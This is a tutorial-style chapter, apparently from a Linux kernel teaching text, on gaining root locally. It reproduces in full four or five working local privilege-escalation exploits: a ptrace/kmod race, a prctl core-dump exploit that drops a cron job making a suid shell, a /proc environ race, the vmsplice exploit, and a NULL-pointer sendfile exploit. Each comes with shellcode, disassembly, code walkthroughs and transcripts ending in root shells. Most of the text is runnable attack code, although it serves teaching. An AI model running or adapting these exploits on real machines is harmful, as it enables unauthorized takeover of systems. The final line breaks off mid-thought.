Once one has access to some machine, it is usually possible to "get root". Certainly physical access suffices - boot from a prepared boot floppy or CDROM, or, in case the BIOS and boot loader are password protected, open the case and short the BIOS battery (or replace the disk drive). (If also opening the case is impossible because of locks, then one did not really have physical access.)
But no physical actions will be required. Any system has flaws, and there will be some time between the moment they are discovered and the moment they are fixed.
Let us discuss a recent Linux kernel flaw found in January and again
in March 2003. The function ptrace()
is used by debuggers,
and allows programs like gdb
to examine and change the state
of a program. This function has a long history of exploits.
The most recent one goes as follows.
The Linux kernel can use modules, sections of code loaded
at run time - usually drivers for some hardware, or code for
some type of filesystem, or some network protocol.
One can load such modules by hand, but when the kmod
feature was
enabled at compile time, the kernel will load modules automatically
when they are needed. The file /proc/sys/kernel/modprobe
contains the name of the module loader - a user space program that
knows where in the filesystem it should look for modules.
Thus, on a kernel where kmod
was not enabled:
% cat /proc/sys/kernel/modprobe cat: /proc/sys/kernel/modprobe: No such file or directorybut on a kernel where
kmod
was enabled:
% cat /proc/sys/kernel/modprobe /sbin/modprobe(There is no real way to disable
kmod
, but the exploit
described below will fail when one echoes /no/such/file
to /proc/sys/kernel/modprobe
.)
A user process can trace processes with the same user ID, but it cannot trace arbitrary processes. One will get "Permission denied" on an attempt to start tracing a setuid root program. And rightly so, for the tracer can make the tracee do anything it wants.
But now suppose some program needs a feature for which some module
must be loaded. The kernel will spawn a child process /sbin/modprobe
(or whatever it found in /proc/sys/kernel/modprobe
),
set its euid and egid to 0 and execute it.
If we can start tracing this child before euid and egid are changed, then we can insert arbitrary code into the child, let it run, and lo! we get what we want.
That is what happens in the exploit below.
/* * Linux kernel ptrace/kmod local root exploit * * This code exploits a race condition in kernel/kmod.c, which creates * kernel thread in insecure manner. This bug allows to ptrace cloned * process and to take control over privileged modprobe binary. * * Should work under all current 2.2.x and 2.4.x kernels. * * I discovered this stupid bug independently on January 25, 2003, that * is (almost) two month before it was fixed and published by Red Hat * and others. * * Wojciech Purczynski <cliph@isec.pl> * * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* * IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY * * (c) 2003 Copyright by iSEC Security Research * * Fixed off-by-one flaw, aeb. */ #include <grp.h> #include <stdio.h> #include <fcntl.h> #include <errno.h> #include <paths.h> #include <string.h> #include <stdlib.h> #include <signal.h> #include <unistd.h> #include <sys/wait.h> #include <sys/stat.h> #include <sys/param.h> #include <sys/types.h> #include <sys/ptrace.h> #include <sys/socket.h> #include <linux/user.h> char cliphcode[] = "\x90\x90\xeb\x1f\xb8\xb6\x00\x00" "\x00\x5b\x31\xc9\x89\xca\xcd\x80" "\xb8\x0f\x00\x00\x00\xb9\xed\x0d" "\x00\x00\xcd\x80\x89\xd0\x89\xd3" "\x40\xcd\x80\xe8\xdc\xff\xff\xff"; #define CODE_SIZE (sizeof(cliphcode) - 1) pid_t parent = 1; pid_t child = 1; pid_t victim = 1; volatile int gotchild = 0; void fatal(char * msg) { perror(msg); kill(parent, SIGKILL); kill(child, SIGKILL); kill(victim, SIGKILL); } void putcode(unsigned long * dst) { char buf[MAXPATHLEN + CODE_SIZE]; unsigned long * src; int i, len; memcpy(buf, cliphcode, CODE_SIZE); len = readlink("/proc/self/exe", buf + CODE_SIZE, MAXPATHLEN - 1); if (len == -1) fatal("[-] Unable to read /proc/self/exe"); len += CODE_SIZE; buf[len++] = '\0'; src = (unsigned long*) buf; for (i = 0; i < len; i += 4) if (ptrace(PTRACE_POKETEXT, victim, dst++, *src++) == -1) fatal("[-] Unable to write shellcode"); } void sigchld(int signo) { struct user_regs_struct regs; if (gotchild++ == 0) return; fprintf(stderr, "[+] Signal caught\n"); if (ptrace(PTRACE_GETREGS, victim, NULL, ®s) == -1) fatal("[-] Unable to read registers"); fprintf(stderr, "[+] Shellcode placed at 0x%08lx\n", regs.eip); putcode((unsigned long *)regs.eip); fprintf(stderr, "[+] Now wait for suid shell...\n"); if (ptrace(PTRACE_DETACH, victim, 0, 0) == -1) fatal("[-] Unable to detach from victim"); exit(0); } void sigalrm(int signo) { errno = ECANCELED; fatal("[-] Fatal error"); } void do_child(void) { int err; child = getpid(); victim = child + 1; signal(SIGCHLD, sigchld); do err = ptrace(PTRACE_ATTACH, victim, 0, 0); while (err == -1 && errno == ESRCH); if (err == -1) fatal("[-] Unable to attach"); fprintf(stderr, "[+] Attached to %d\n", victim); while (!gotchild) ; if (ptrace(PTRACE_SYSCALL, victim, 0, 0) == -1) fatal("[-] Unable to setup syscall trace"); fprintf(stderr, "[+] Waiting for signal\n"); for(;;); } void do_parent(char * progname) { struct stat st; int err; errno = 0; socket(AF_SECURITY, SOCK_STREAM, 1); do { err = stat(progname, &st); } while (err == 0 && (st.st_mode & S_ISUID) != S_ISUID); if (err == -1) fatal("[-] Unable to stat myself"); alarm(0); system(progname); } void prepare(void) { if (geteuid() == 0) { initgroups("root", 0); setgid(0); setuid(0); execl(_PATH_BSHELL, _PATH_BSHELL, NULL); fatal("[-] Unable to spawn shell"); } } int main(int argc, char ** argv) { prepare(); signal(SIGALRM, sigalrm); alarm(10); parent = getpid(); child = fork(); victim = child + 1; if (child == -1) fatal("[-] Unable to fork"); if (child == 0) do_child(); else do_parent(argv[0]); return 0; }
Exercise
Study the above code carefully. What does this cliphcode
do?
Hint: ask gdb
to disassemble it. One gets
/* * a: syscall number * b, c, d: args * chown(path, owner, group) * chmod(path, mode) * exit(status) * 0x8049020 <cliphcode>: nop 0x8049021 <cliphcode+1>: nop 0x8049022 <cliphcode+2>: jmp 0x8049043 <cliphcode+35> 0x8049024 <cliphcode+4>: mov $0xb6,%eax / 182 = __NR_chown 0x8049029 <cliphcode+9>: pop %ebx / path 0x804902a <cliphcode+10>: xor %ecx,%ecx / owner 0 0x804902c <cliphcode+12>: mov %ecx,%edx / group 0 0x804902e <cliphcode+14>: int $0x80 0x8049030 <cliphcode+16>: mov $0xf,%eax / 15 = __NR_chmod 0x8049035 <cliphcode+21>: mov $0xded,%ecx / mode 06755 0x804903a <cliphcode+26>: int $0x80 0x804903c <cliphcode+28>: mov %edx,%eax 0x804903e <cliphcode+30>: mov %edx,%ebx / status 0 0x8049040 <cliphcode+32>: inc %eax / 1 = __NR_exit 0x8049041 <cliphcode+33>: int $0x80 0x8049043 <cliphcode+35>: call 0x8049024 <cliphcode+4> 0x8049048 <cliphcode+40>: */where I added the comments.
Exercise The code above uses the proc
filesystem. How should it be modified when proc
is unavailable?
This peculiar socket call uses an unimplemented address family - in particular
the kernel will not know about it and will ask whether there is
a module that knows about AF_SECURITY
. Typically the call
will look like /sbin/modprobe -s -k net-pf-14
.
I found two incarnations of this exploit on the net, km3.c by Andrzej Szombierski (anszom), and isec-ptrace-kmod-exploit.c by Wojciech Purczynski (cliph), and two derived versions, myptrace.c by snooq, and the heavily commented ptrace.c by Sed. Not all of these work for me, but I tried the above one and after fixing an off-by-one bug and realising that the reason things failed was because I tried it on an NFS mounted filesystem it gave me a root shell:
[+] Attached to 11930 [+] Waiting for signal [+] Signal caught [+] Shellcode placed at 0x4001189d [+] Now wait for suid shell... sh-2.05#
This problem was fixed in Linux 2.4.21.
Playing with core dumps is a well-known technique. The contents of the dump
can be partially determined by having suitable strings in executable or
environment. If an interpreter is so friendly to ignore all garbage,
possibly only producing some error messages, then it can be made to
execute arbitrary commands. Either dump to a predetermined file,
for example via symlink, or dump in a suitable directory where all files
are meaningful. Here an example of the latter, dumping to /etc/cron.d
.
/*****************************************************/ /* Local r00t Exploit for: */ /* Linux Kernel PRCTL Core Dump Handling */ /* ( BID 18874 / CVE-2006-2451 ) */ /* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */ /* By: */ /* - dreyer <luna@aditel.org> (main PoC code) */ /* - RoMaNSoFt <roman@rs-labs.com> (local root code) */ /* [ 10.Jul.2006 ] */ /*****************************************************/ #include <stdio.h> #include <sys/time.h> #include <sys/resource.h> #include <unistd.h> #include <linux/prctl.h> #include <stdlib.h> #include <sys/types.h> #include <signal.h> char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n"; int main() { int child; struct rlimit corelimit; printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n"); printf("By: dreyer & RoMaNSoFt\n"); printf("[ 10.Jul.2006 ]\n\n"); corelimit.rlim_cur = RLIM_INFINITY; corelimit.rlim_max = RLIM_INFINITY; setrlimit(RLIMIT_CORE, &corelimit); printf("[*] Creating Cron entry\n"); if ( !( child = fork() )) { chdir("/etc/cron.d"); prctl(PR_SET_DUMPABLE, 2); sleep(200); exit(1); } kill(child, SIGSEGV); printf("[*] Sleeping for approx. one minute (** please wait **)\n"); sleep(62); printf("[*] Running shell (remember to remove /tmp/sh when finished) ...\n"); system("/tmp/sh -i"); }
From man prctl
:
PR_SET_DUMPABLE (since Linux 2.3.20) Set the state of the flag determining whether core dumps are produced for this process upon delivery of a signal whose default behavior is to produce a core dump. (Normally this flag is set for a process by default, but it is cleared when a set-user-ID or set-group-ID program is executed and also by various system calls that manipulate process UIDs and GIDs). In kernels up to and including 2.6.12, arg2 must be either 0 (process is not dumpable) or 1 (process is dumpable). Between kernels 2.6.13 and 2.6.17, the value 2 was also permitted, which caused any binary which normally would not be dumped to be dumped readable by root only; for security reasons, this feature has been removed. (See also the description of /proc/sys/fs/suid_dumpable in proc(5).)so the dump that normally would not have been permitted occurred here and gave a core file readable by root only. Fortunately
cron
is root
and executes the contents (every minute, but the first execution already
removes the core file again).
The payload could be improved. For example, many shells will drop privileges so that a suid shell doesn't work. But of course this is an entirely convincing proof-of-concept.
A few days later: Another exploit from July 2006. Again involving PR_SET_DUMPABLE, but in an entirely different way.
/* ** Author: h00lyshit ** Vulnerable: Linux 2.6 ALL ** Type of Vulnerability: Local Race ** Tested On : various distros ** Vendor Status: unknown ** ** Disclaimer: ** In no event shall the author be liable for any damages ** whatsoever arising out of or in connection with the use ** or spread of this information. ** Any use of this information is at the user's own risk. ** ** Compile: ** gcc h00lyshit.c -o h00lyshit ** ** Usage: ** h00lyshit <very big file on the disk> ** ** Example: ** h00lyshit /usr/X11R6/lib/libethereal.so.0.0.1 ** ** if y0u dont have one, make big file (~100MB) in /tmp with dd ** and try to junk the cache e.g. cat /usr/lib/* >/dev/null ** */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #include <errno.h> #include <sched.h> #include <sys/types.h> #include <sys/stat.h> #include <sys/prctl.h> #include <sys/mman.h> #include <sys/wait.h> #include <linux/a.out.h> #include <asm/unistd.h> static struct exec ex; static char *e[256]; static char *a[4]; static char b[512]; static char t[256]; static volatile int *c; /* h00lyshit shell code */ __asm__ (" __excode: call 1f \n" " 1: mov $23, %eax \n" " xor %ebx, %ebx \n" " int $0x80 \n" " pop %eax \n" " mov $cmd-1b, %ebx \n" " add %eax, %ebx \n" " mov $arg-1b, %ecx \n" " add %eax, %ecx \n" " mov %ebx, (%ecx) \n" " mov %ecx, %edx \n" " add $4, %edx \n" " mov $11, %eax \n" " int $0x80 \n" " mov $1, %eax \n" " int $0x80 \n" " arg: .quad 0x00, 0x00 \n" " cmd: .string \"/bin/sh\" \n" " __excode_e: nop \n" " .global __excode \n" " .global __excode_e \n" ); extern void (*__excode) (void); extern void (*__excode_e) (void); void error (char *err) { perror (err); fflush (stderr); exit (1); } /* exploit this shit */ void exploit (char *file) { int i, fd; void *p; struct stat st; printf ("\ntrying to exploit %s\n\n", file); fflush (stdout); chmod ("/proc/self/environ", 04755); c = mmap (0, 4096, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, 0, 0); memset ((void *) c, 0, 4096); /* slow down machine */ fd = open (file, O_RDONLY); fstat (fd, &st); p = (void *) mmap (0, st.st_size, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0); if (p == MAP_FAILED) error ("mmap"); prctl (PR_SET_DUMPABLE, 0, 0, 0, 0); sprintf (t, "/proc/%d/environ", getpid ()); sched_yield (); execve (NULL, a, e); madvise (0, 0, MADV_WILLNEED); i = fork (); /* give it a try */ if (i) { (*c)++; !madvise (p, st.st_size, MADV_WILLNEED) ? : error ("madvise"); prctl (PR_SET_DUMPABLE, 1, 0, 0, 0); sched_yield (); } else { nice(10); while (!(*c)); sched_yield (); execve (t, a, e); error ("failed"); } waitpid (i, NULL, 0); exit (0); } int main (int ac, char **av) { int i, j, k, s; char *p; memset (e, 0, sizeof (e)); memset (a, 0, sizeof (a)); a[0] = strdup (av[0]); a[1] = strdup (av[0]); a[2] = strdup (av[1]); if (ac < 2) error ("usage: binary <big file name>"); if (ac > 2) exploit (av[2]); printf ("\npreparing"); fflush (stdout); /* make setuid a.out */ memset (&ex, 0, sizeof (ex)); N_SET_MAGIC (ex, NMAGIC); N_SET_MACHTYPE (ex, M_386); s = ((unsigned) &__excode_e) - (unsigned) &__excode; ex.a_text = s; ex.a_syms = -(s + sizeof (ex)); memset (b, 0, sizeof (b)); memcpy (b, &ex, sizeof (ex)); memcpy (b + sizeof (ex), &__excode, s); /* make environment */ p = b; s += sizeof (ex); j = 0; for (i = k = 0; i < s; i++) { if (!p[i]) { e[j++] = &p[k]; k = i + 1; } } /* reexec */ getcwd (t, sizeof (t)); strcat (t, "/"); strcat (t, av[0]); execve (t, a, e); error ("execve"); return 0; }
What happens? We start with ac==2
. Construct an a.out format
binary in the array b[]
, first the header from ex
,
then the code from __excode
. Construct an environment
that is identical to the binary. The NULs that cannot be inside
the strings are just the string terminators. Reexec ourselves
with ac==3
, and with the environment just constructed.
So far the preparation. The real stuff happens in exploit()
.
Make the binary file /proc/self/environ
suid and executable.
Set this binary to non-dumpable.
Do various silly things and fork. If we are the parent, set a flag,
ask to preread a large file, and set the binary to dumpable again.
If we are the child, wait for the flag, and then exec this suid binary file.
Bingo! or not.
The kernel, in fs/proc/base.c
, has code like
proc_pid_make_inode() { ... inode->i_uid = 0; if (dumpable) inode->i_uid = task->euid; ... }If dumping core is not allowed, root is the owner of the proc files, otherwise the effective user is the owner. The first
PR_SET_DUMPABLE
call inhibits core dumps, so root will be the owner.
But if root is the owner, then ordinary reading, needed for the exec,
will fail: the read method of /proc/.../environ
is
proc_pid_environ()
, and it will allow reading only when
ptrace_may_attach()
returns true, and that latter function
tests the dumpable
flag. Quickly change back to dumpable,
namely after the file's owner has been set, and before its readabilty
was denied. A race.
If we win the race then the prepared binary is executed suid root.
More recent kernels are vulnerable to the following (Feb 2008) exploit of mmap/vmsplice.
/* * Linux vmsplice Local Root Exploit * By qaaz * * Linux 2.6.17 - 2.6.24.1 */ #define _GNU_SOURCE #include <stdio.h> #include <errno.h> #include <stdlib.h> #include <string.h> #include <malloc.h> #include <limits.h> #include <signal.h> #include <unistd.h> #include <sys/uio.h> #include <sys/mman.h> #include <asm/page.h> #define __KERNEL__ #include <asm/unistd.h> #define PIPE_BUFFERS 16 #define PG_compound 14 #define uint unsigned int #define static_inline static inline __attribute__((always_inline)) #define STACK(x) (x + sizeof(x) - 40) struct page { unsigned long flags; int count; int mapcount; unsigned long private; void *mapping; unsigned long index; struct { long next, prev; } lru; }; void exit_code(); char exit_stack[1024 * 1024]; void die(char *msg, int err) { printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err)); fflush(stdout); fflush(stderr); exit(1); } #if defined (__i386__) #ifndef __NR_vmsplice #define __NR_vmsplice 316 #endif #define USER_CS 0x73 #define USER_SS 0x7b #define USER_FL 0x246 static_inline void exit_kernel() { __asm__ __volatile__ ( "movl %0, 0x10(%%esp) ;" "movl %1, 0x0c(%%esp) ;" "movl %2, 0x08(%%esp) ;" "movl %3, 0x04(%%esp) ;" "movl %4, 0x00(%%esp) ;" "iret" : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL), "i" (USER_CS), "r" (exit_code) ); } static_inline void * get_current() { unsigned long curr; __asm__ __volatile__ ( "movl %%esp, %%eax ;" "andl %1, %%eax ;" "movl (%%eax), %0" : "=r" (curr) : "i" (~8191) ); return (void *) curr; } #elif defined (__x86_64__) #ifndef __NR_vmsplice #define __NR_vmsplice 278 #endif #define USER_CS 0x23 #define USER_SS 0x2b #define USER_FL 0x246 static_inline void exit_kernel() { __asm__ __volatile__ ( "swapgs ;" "movq %0, 0x20(%%rsp) ;" "movq %1, 0x18(%%rsp) ;" "movq %2, 0x10(%%rsp) ;" "movq %3, 0x08(%%rsp) ;" "movq %4, 0x00(%%rsp) ;" "iretq" : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL), "i" (USER_CS), "r" (exit_code) ); } static_inline void * get_current() { unsigned long curr; __asm__ __volatile__ ( "movq %%gs:(0), %0" : "=r" (curr) ); return (void *) curr; } #else #error "unsupported arch" #endif #if defined (_syscall4) #define __NR__vmsplice __NR_vmsplice _syscall4( long, _vmsplice, int, fd, struct iovec *, iov, unsigned long, nr_segs, unsigned int, flags) #else #define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl)) #endif static uint uid, gid; void kernel_code() { int i; uint *p = get_current(); for (i = 0; i < 1024-13; i++) { if (p[0] == uid && p[1] == uid && p[2] == uid && p[3] == uid && p[4] == gid && p[5] == gid && p[6] == gid && p[7] == gid) { p[0] = p[1] = p[2] = p[3] = 0; p[4] = p[5] = p[6] = p[7] = 0; p = (uint *) ((char *)(p + 8) + sizeof(void *)); p[0] = p[1] = p[2] = ~0; break; } p++; } exit_kernel(); } void exit_code() { if (getuid() != 0) die("wtf", 0); printf("[+] root\n"); putenv("HISTFILE=/dev/null"); execl("/bin/bash", "bash", "-i", NULL); die("/bin/bash", errno); } int main(int argc, char *argv[]) { int pi[2]; size_t map_size; char * map_addr; struct iovec iov; struct page * pages[5]; uid = getuid(); gid = getgid(); setresuid(uid, uid, uid); setresgid(gid, gid, gid); printf("-----------------------------------\n"); printf(" Linux vmsplice Local Root Exploit\n"); printf(" By qaaz\n"); printf("-----------------------------------\n"); if (!uid || !gid) die("!@#$", 0); /*****/ pages[0] = *(void **) &(int[2]){0,PAGE_SIZE}; pages[1] = pages[0] + 1; map_size = PAGE_SIZE; map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (map_addr == MAP_FAILED) die("mmap", errno); memset(map_addr, 0, map_size); printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size); printf("[+] page: 0x%lx\n", pages[0]); printf("[+] page: 0x%lx\n", pages[1]); pages[0]->flags = 1 << PG_compound; pages[0]->private = (unsigned long) pages[0]; pages[0]->count = 1; pages[1]->lru.next = (long) kernel_code; /*****/ pages[2] = *(void **) pages[0]; pages[3] = pages[2] + 1; map_size = PAGE_SIZE; map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (map_addr == MAP_FAILED) die("mmap", errno); memset(map_addr, 0, map_size); printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size); printf("[+] page: 0x%lx\n", pages[2]); printf("[+] page: 0x%lx\n", pages[3]); pages[2]->flags = 1 << PG_compound; pages[2]->private = (unsigned long) pages[2]; pages[2]->count = 1; pages[3]->lru.next = (long) kernel_code; /*****/ pages[4] = *(void **) &(int[2]){PAGE_SIZE,0}; map_size = PAGE_SIZE; map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (map_addr == MAP_FAILED) die("mmap", errno); memset(map_addr, 0, map_size); printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size); printf("[+] page: 0x%lx\n", pages[4]); /*****/ map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE; map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (map_addr == MAP_FAILED) die("mmap", errno); memset(map_addr, 0, map_size); printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size); /*****/ map_size -= 2 * PAGE_SIZE; if (munmap(map_addr + map_size, PAGE_SIZE) < 0) die("munmap", errno); /*****/ if (pipe(pi) < 0) die("pipe", errno); close(pi[0]); iov.iov_base = map_addr; iov.iov_len = ULONG_MAX; signal(SIGPIPE, exit_code); _vmsplice(pi[1], &iov, 1, 0); die("vmsplice", errno); return 0; }
Remains the question what this does, and why it works.
In main()
we have an array pages
of pointers to a struct page. We first do (on a 32-bit machine;
otherwise 64-bit addresses are written in page[0]
and
page[4]
, with 0 in one half and 4096 in the other half)
pages[0] = 0; pages[1] = 32; pages[2] = 16384; pages[3] = 16416; pages[4] = 4096;Here 32 is
sizeof(struct page)
and 16384 is
1<<PG_compound
and 4096 is PAGE_SIZE
.
One page of memory (4096 bytes) is mapped at each of the three
fixed addresses 0 and 16384 and 4096. And 50 pages of memory
are mapped at some arbitrary place P (PIPE_BUFFERS
is 16),
and the 49th page is unmapped again. A pipe is created, its reading
end is closed. We set the signal routine that must be called when
we get the SIGPIPE signal (for writing to a pipe without readers).
Now we do vmsplice()
on its writing end.
This maps the memory area starting at P and with length ULONG_MAX
into the (writing end of) a pipe. Ha! An integer overflow bug in the
kernel. It fails to see that ULONG_MAX
is more than fits.
But now, what happens? Let me read 2.6.24 code. We start with
sys_vmsplice()
in fs/splice.c
. It calls
vmsplice_to_pipe()
, which calls get_iovec_page_array()
and there
int buffers = 0; base = entry.iov_base; len = entry.iov_len; off = (unsigned long) base & ~PAGE_MASK; npages = (off + len + PAGE_SIZE - 1) >> PAGE_SHIFT; if (npages > PIPE_BUFFERS - buffers) npages = PIPE_BUFFERS - buffers;(so
off = 0
, len = -1
, npages = 0
, and the
last two lines, designed to test for overflow, do not notice anything).
Now we fetch these 0 pages:
error = get_user_pages(current, current->mm, base, npages, 0, 0, &pages[buffers], NULL);This function lives in
mm/memory.c
and is a big
do { ... if (!vma) return i ? : -EFAULT; ... pages[i] = page; ... i++; start += PAGE_SIZE; len--; } while (len && start < vma->vm_end);loop, where
len
is the npages
parameter.
Since that was 0, this loop never finishes by completing
the copy of the required number of pages - instead it finishes
when it reaches the end of the mapped area, after 48 pages,
overflowing the pages[]
array.
So, the stack of vmsplice_to_pipe()
is corrupted.
When get_user_pages()
returns, get_iovec_page_array()
also fills the array partial
, also overflowing that:
for (i = 0; i < error; i++) { const int plen = min(len, PAGE_SIZE); partial[buffers].offset = 0; partial[buffers].len = plen; len -= plen; buffers++; }Here
error
is the return value of get_user_pages()
,
the number of user pages gotten, 48, and partial
is an array
of structs
struct partial_page { unsigned int offset; unsigned int len; unsigned long private; };filled with a repeated (0, 4096, ?). This overflows the array
partial
and thereafter also the array pages
:
static long vmsplice_to_pipe(struct file *file, const struct iovec __user *iov, unsigned long nr_segs, unsigned int flags) { struct pipe_inode_info *pipe; struct page *pages[PIPE_BUFFERS]; struct partial_page partial[PIPE_BUFFERS]; struct splice_pipe_desc spd = { .pages = pages, .partial = partial, .flags = flags, .ops = &user_page_pipe_buf_ops, }; ... get_iovec_page_array(iov, nr_segs, pages, partial, flags & SPLICE_F_GIFT); ... return splice_to_pipe(pipe, &spd); }
Now splice_to_pipe()
is called. We read
for (;;) { if (!pipe->readers) { send_sig(SIGPIPE, current, 0); break; } ... } while (page_nr < spd_pages) page_cache_release(spd->pages[page_nr++]);
There are no readers since we closed the reading end, and a signal is
generated. The get_user_pages()
had done follow_page()
which does a get_page()
which does
atomic_inc(&page->_count)
.
Now a release is done for all pages involved and the function
put_page()
(in mm/swap.c
) is called on each.
But the page struct pointers were overwritten with 0 and 4096,
so the kernel looks there, that is, in user memory instead of kernel memory.
The mmap calls have prepared some memory there containing valid-looking
page structs, and these have the "compound page" bit set. Consequently,
the put_compound_page()
routine is called, and
static void put_compound_page(struct page *page) { page = compound_head(page); if (put_page_testzero(page)) { compound_page_dtor *dtor; dtor = get_compound_page_dtor(page); (*dtor)(page); } }it finds the destructor routine address in the compound page struct, and calls that. Aha.
Our routine kernel_code()
is called, it finds the place in
the kernel where uid and gid are stored (that is why the exploit
starts testing whether we are root already - there are too many
places that contain 0), and stores 0 there. The pointer current
points at the current task_struct (defined in <linux/sched.h>
)
which has
uid_t uid,euid,suid,fsuid; gid_t gid,egid,sgid,fsgid; struct group_info *group_info; kernel_cap_t cap_effective, cap_inheritable, cap_permitted; unsigned keep_capabilities:1;and we see that the final assignments in
kernel_code()
give the process all capabilities. Now we return and start a root shell.
% ./qaaz ----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [+] mmap: 0x0 .. 0x1000 [+] page: 0x0 [+] page: 0x20 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4020 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0x40158000 .. 0x4018a000 [+] root #
Yes, it works (on plain 2.6.24).
The kernel uses operations structures everywhere, so that if we
have to do foo()
on an object x
, the kernel does
x->ops->foo()
. If one is a careful programmer and prefers
robust code, one would write
if (x->ops && x->ops->foo) x->ops->foo();and indeed, this occurs all over the place in Linus' original code. That is local correctness: one sees at the call site that the pointer is non-NULL. Over time, the kernel source has moved in the direction of global correctness (only): after reading the entire kernel source one sees that
x->ops->foo
is never NULL, so that the test is
superfluous, and deletes the test. Of course this leads to fragile code,
difficult to maintain.
If one makes a mistake, and one always does, the direct result would be a call of a function at address 0, probably followed by a kernel crash. This can be exploited as a DoS. It becomes a local root exploit if it is possible to map address 0 in user space and put suitable code there. Below an example that works on my machine (August 2009).
First the code that starts the exploit:
#include <sys/personality.h> #include <stdio.h> #include <unistd.h> int main(void) { if (personality(PER_SVR4) < 0) { perror("personality"); return -1; } fprintf(stderr, "padlina z lublina!\n"); execl("./exploit", "exploit", 0); }and then the actual exploit (for an i386):
/* * 14.08.2009, babcia padlina * * vulnerability discovered by google security team * * some parts of exploit code borrowed from vmsplice exploit by qaaz * per_svr4 mmap zero technique developed by Julien Tinnes and Tavis Ormandy: * http://xorl.wordpress.com/2009/07/16/cve-2009-1895- linux-kernel-per_clear_on_setid-personality-bypass/ */ #include <stdio.h> #include <sys/socket.h> #include <sys/user.h> #include <sys/types.h> #include <sys/wait.h> #include <inttypes.h> #include <sys/reg.h> #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <sys/mman.h> #include <sys/personality.h> static unsigned int uid, gid; #define USER_CS 0x73 #define USER_SS 0x7b #define USER_FL 0x246 #define STACK(x) (x + sizeof(x) - 40) void exit_code(); char exit_stack[1024 * 1024]; static inline __attribute__((always_inline)) void *get_current() { unsigned long curr; __asm__ __volatile__ ( "movl %%esp, %%eax ;" "andl %1, %%eax ;" "movl (%%eax), %0" : "=r" (curr) : "i" (~8191) ); return (void *) curr; } static inline __attribute__((always_inline)) void exit_kernel() { __asm__ __volatile__ ( "movl %0, 0x10(%%esp) ;" "movl %1, 0x0c(%%esp) ;" "movl %2, 0x08(%%esp) ;" "movl %3, 0x04(%%esp) ;" "movl %4, 0x00(%%esp) ;" "iret" : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL), "i" (USER_CS), "r" (exit_code) ); } void kernel_code() { int i; uint *p = get_current(); for (i = 0; i < 1024-13; i++) { if (p[0] == uid && p[1] == uid && p[2] == uid && p[3] == uid && p[4] == gid && p[5] == gid && p[6] == gid && p[7] == gid) { p[0] = p[1] = p[2] = p[3] = 0; p[4] = p[5] = p[6] = p[7] = 0; p = (uint *) ((char *)(p + 8) + sizeof(void *)); p[0] = p[1] = p[2] = ~0; break; } p++; } exit_kernel(); } void exit_code() { if (getuid() != 0) { fprintf(stderr, "failed\n"); exit(-1); } execl("/bin/sh", "sh", "-i", NULL); } int main(void) { char template[] = "/tmp/padlina.XXXXXX"; int fdin, fdout; void *page; uid = getuid(); gid = getgid(); setresuid(uid, uid, uid); setresgid(gid, gid, gid); if ((personality(0xffffffff)) != PER_SVR4) { if ((page = mmap(0x0, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS, 0, 0)) == MAP_FAILED) { perror("mmap"); return -1; } } else { if (mprotect(0x0, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC) < 0) { perror("mprotect"); return -1; } } *(char *)0 = '\x90'; *(char *)1 = '\xe9'; *(unsigned long *)2 = (unsigned long)&kernel_code - 6; if ((fdin = mkstemp(template)) < 0) { perror("mkstemp"); return -1; } if ((fdout = socket(PF_PPPOX, SOCK_DGRAM, 0)) < 0) { perror("socket"); return -1; } unlink(template); ftruncate(fdin, PAGE_SIZE); sendfile(fdout, fdin, NULL, PAGE_SIZE); }
And indeed:
% gcc -o run run.c && gcc -o exploit exploit.c && ./run padlina z lublina! sh-3.00#
What happens? We have seen get_current()
and
exit_kernel()
and kernel_code()
and exit_code()
in the vmsplice exploit above. As before, we somehow get the kernel to call
kernel_code()
, which sets uid and gid to 0 and gives us all
capabilities, and then returns to exit_code()
and starts a root shell.
The new part is that we store 0x90 (nop), 0xe9 (jump) and a value A
at addresses 0, 1, and 2-5. (The jump is relative, and the next instruction
starts at address 6, so the jump will jump to A+6, that is, to
kernel_code
.) It remains to get the kernel to jump to
address 0 where our code is waiting. But the sendfile()
causes the kernel to do
static ssize_t sock_sendpage(...) { ... return sock->ops->sendpage(sock, page, offset, size, flags); }and for the PF_PPPOX protocol family that pointer is NULL.
Finally, why the personality nonsense? In the SVR4 personality we have access to page 0.
Remotely logged in into some Irix machine:
